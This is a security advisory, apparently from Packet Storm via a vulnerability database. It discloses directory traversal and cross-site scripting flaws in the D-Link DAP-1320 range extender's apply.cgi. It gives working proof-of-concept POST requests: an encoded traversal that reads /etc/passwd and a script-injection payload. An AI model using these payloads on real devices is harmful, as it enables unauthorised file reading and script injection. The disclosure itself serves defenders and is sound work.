Lucene search
K

D-Link DAP-1320 Directory Traversal / Cross Site Scripting

🗓️ 17 Apr 2014 00:00:00Reported by Kyle LovettType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 13 Views

D-Link DAP-1320 Wireless Range Extender Vulnerabilitie

Code
`D-Link's DAP-1320 Wireless Range Extender suffers from both a  
directory traversal and a XSS vulnerability on all firmware versions.  
(current v. 1.20B07)  
  
---------------------------------------------------------------------------------------------------------------------  
Directory Traversal  
CWE-22: Path Traversal  
  
The POST param 'html_response_page' of apply.cgi suffers from a  
directory traversal vulnerability.  
  
The following example will display the contents of /etc/passwd:  
  
http://<IP>/apply.cgi  
Pragma: no-cache  
Cache-control: no-cache  
Content-Type: application/x-www-form-urlencoded  
  
POST html_response_page=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&login_name=&html_response_message=just_login&log_pass=&login_n=admin&action=do_graph_auth&tmp_log_pass=PAN&tmp_log_pass_auth=FRIED&graph_code=0DEY&session_id=57687&gcode_base64=8TEHPOO%3D  
HTTP/1.1  
  
---------------------------------------------------------------------------------------------------------------------  
XSS  
CWE-79: Cross Site Scripting  
  
The POST param 'html_response_page' of apply.cgi suffers from a XSS  
vulnerability.  
  
Example:  
  
http://<IP>/apply.cgi  
Pragma: no-cache  
Cache-control: no-cache  
Content-Type: application/x-www-form-urlencoded  
  
POST  
html_response_page=%3Cscript%3Ealert%28"SquirrelLord"%29%3B%3C%2Fscript%3E&login_name=Huggy&html_response_message=just_login&log_pass=&login_n=admin&action=do_graph_auth&tmp_log_pass=pop&tmp_log_pass_auth=goes&graph_code=joffrey&session_id=57687&gcode_base64=ZZTOPI%3D  
HTTP/1.1  
  
---------------------------------------------------------------------------------------------------------------------  
  
Vendor Link:  
http://support.dlink.com/ProductInfo.aspx?m=DAP-1320  
  
Research Contact: K Lovett  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation